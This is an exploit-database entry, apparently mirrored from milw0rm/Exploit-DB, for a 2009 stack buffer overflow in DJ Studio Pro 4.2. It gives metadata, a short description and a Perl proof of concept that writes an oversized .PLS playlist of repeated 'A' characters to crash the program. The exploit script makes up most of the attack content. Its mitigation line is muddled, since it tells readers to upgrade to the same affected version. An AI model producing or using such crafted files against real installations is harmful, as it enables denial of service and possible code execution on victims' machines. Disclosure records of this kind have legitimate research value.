DJ Studio Pro 4.2 (.PLS file) Crash Vulnerability Exploit

vendor:

DJ Studio Pro

by:

prodigy

9.3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: DJ Studio Pro

Affected Version From: 4.2

Affected Version To: 4.2

Patch Exists: YES

Related CWE: N/A

CPE: a:e-soft:dj_studio_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

DJ Studio Pro 4.2 (.PLS file) Crash Vulnerability Exploit

DJ Studio Pro 4.2 is vulnerable to a buffer overflow vulnerability when a maliciously crafted .PLS file is loaded. The vulnerability is caused due to a boundary error when handling the file, which can be exploited to cause a stack-based buffer overflow by a maliciously crafted .PLS file. This may allow an attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of DJ Studio Pro 4.2

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
#
# DJ Studio Pro 4.2 (.PLS file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: smack_the_stream@hotmail.com
# 
# Vendor: http://www.e-soft.co.uk/
#
# Usage to reproduce the bug: when you created the malicious file, load the file and boooom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "crash.pls";

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "File Created successfully\n";

==EndPoC==


##Greetz: Greetz myself for find the bug.

# milw0rm.com [2009-09-15]